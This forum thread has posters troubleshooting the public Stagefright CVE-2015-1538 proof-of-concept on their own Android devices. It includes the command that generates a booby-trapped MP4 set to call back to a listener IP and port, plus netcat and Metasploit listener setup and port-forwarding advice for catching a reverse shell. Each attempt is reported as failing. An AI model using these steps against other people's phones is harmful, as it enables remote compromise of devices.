Android Stagefright CVE-2015-1538.py

[0v3rl04d]

Hi guys,

after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538.

I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable.

The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import.

After this i've tried to generate the file.mp4 with this command:

$python2 mp4.py -c [LAN IP] -p 4444

The script correctly generate an file.mp4 without an error.

After i've launch a listener with:

$netcat -l -p 4444

I've sended the file.mp4 to my smartphone and i've tried to exec this.

The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result.

Any solution? Thanks everyone and sorry for my english ;-P

[cooper]

The app show me, in green, the module CVE-1538 e other...

According to the screenshots provided for the Stagefright Detector app they released green means your phone is NOT susceptible.

Given that, what is it you're trying to do?

[0v3rl04d]

Sorry, i'm not mean the red final bar, but the module result in the new version of the app are colored in green and red.

This is an example on my phone:

http://imgur.com/Lyex9y5

[0v3rl04d]

Anyone?

[digip]

I would assume the same thing Cooper said, that if you are in green for "CVE-1538" specifically, you are only vulnerable to the attacks that fall under the other CVE's that are listed in red. Other thing to consider, that if you are vulnerable, maybe the listener doesn't see anything because it can't reach your machine from the phone, which may need port forwarding and such in place to see the reply from the phone.

Test everything is working for the listener first, connect locally from another machine to your listener. If works locally, then try from the internet, such as setting up a fake web page and then connecting over yoru browser.

ex:

cat sometextfile.txt | nc -l -p 4444

(Or if on windows)

​type sometextfile.txt | nc -l -p 4444

And then in your browser, connect to your local IP using http://your.local.ip/and your internet based IP (Type "ip" by itself into google to get your external IP) you should see the output of your text file in your web browser. if that works locally and remote, then you should see whatever the phone is supposed to send back to you. Get the listener working first, then you can test if the code works against your phone. If it doens't send back a shell or whatever prompt it's supposed to show from the phone, then you probably aren't vulnerable.

[0v3rl04d]

Thank you, is very simple and good test for netcat. I did't know it! I've tested locally and remotely and both work well!

So probably my phone isn't vulnerable... I'll try with another phone...

[ZaraByte]

Thank you, is very simple and good test for netcat. I did't know it! I've tested locally and remotely and both work well!

So probably my phone isn't vulnerable... I'll try with another phone...

People wanted me to do a video on this the public exploit released doesn't work for my Nexus 7 2013 tablet even though the detector claims my tablet is vulnerable renamed the python script to mp4.py that part works when making the mp4 set my chost and set my cback port made the mp4 called test.mp4 placed it on my kali apache server started a nc -l -p 4444 went to my kali webserver to run the mp4 nothing happens :B no connect back on netcat so :B